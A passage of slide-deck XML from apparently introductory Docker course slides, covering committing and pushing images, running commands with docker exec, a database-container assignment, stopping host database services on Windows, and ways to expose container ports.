              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:gr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284"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435925" y="1556375"/>
            <a:ext cx="8589300" cy="2906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100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker login</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker commit CONTAINER [REPOSITORY[:TAG]]</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker commit containername username/reponame:tagname</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker push username/reponame:tagname</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2050">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2550"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1758" name="Google Shape;1758;p284"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270275" y="178475"/>
            <a:ext cx="8689500" cy="78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275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3050">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create Image from running container &amp; upload to docker registry</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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285"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="212350"/>
            <a:ext cx="8689500" cy="4718700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="031B4E"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>Run Commands in a Docker Container</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="2350"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="368300" lvl="0" marL="88900" marR="88900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker exec -it &lt;container_id_or_name&gt; &lt;linux_commands&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="88900" marR="88900" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="142857"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2100">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker exec -it somecontainer echo "I'm inside the container!"</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400"/>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2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Docker Assignment</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1769" name="Google Shape;1769;p286"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3705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solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NoSQL DBs</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download mongo image and implement the nodejs / python code.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download redis image and implement the nodejs/python code.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL DBs</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download mysql image and implement the nodejs / python code.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download postgres image and implement the nodejs / python code.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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2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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remember</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3020">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1775" name="Google Shape;1775;p287"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="3705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2500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stop the database services in Host Machine</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2500">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Solution for windows :</a:t>
            </a:r>
            <a:endParaRPr sz="2050">
              <a:solidFill>
                <a:srgbClr val="24292F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-358775" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292F"/>
              </a:buClr>
              <a:buSzPts val="2050"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Stop docker container</a:t>
            </a:r>
            <a:endParaRPr sz="2050">
              <a:solidFill>
                <a:srgbClr val="24292F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-358775" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292F"/>
              </a:buClr>
              <a:buSzPts val="2050"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>win + r and type services.msc</a:t>
            </a:r>
            <a:endParaRPr sz="2050">
              <a:solidFill>
                <a:srgbClr val="24292F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-358775" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292F"/>
              </a:buClr>
              <a:buSzPts val="2050"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Find postgres/mongo services and stop</a:t>
            </a:r>
            <a:endParaRPr sz="2050">
              <a:solidFill>
                <a:srgbClr val="24292F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-358775" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292F"/>
              </a:buClr>
              <a:buSzPts val="2050"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2050">
                <a:solidFill>
                  <a:srgbClr val="24292F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Start your container again</a:t>
            </a:r>
            <a:endParaRPr sz="2050">
              <a:solidFill>
                <a:srgbClr val="24292F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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2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3220">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Notes</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1781" name="Google Shape;1781;p288"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402625" y="1067575"/>
            <a:ext cx="8520600" cy="3807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629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By default containers are isolated, means all ports are closed.</a:t>
            </a:r>
            <a:endParaRPr sz="1629">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can open the port in 3 Ways</a:t>
            </a:r>
            <a:endParaRPr sz="1629">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. using EXPOSE command in Dockerfile.</a:t>
            </a:r>
            <a:endParaRPr sz="1629">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1807">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>--expose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1607">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>flag in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1607">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1607">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t> command.</a:t>
            </a:r>
            <a:endParaRPr sz="1607">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1629">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Using docker-compose</a:t>
            </a:r>
            <a:endParaRPr sz="1629">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
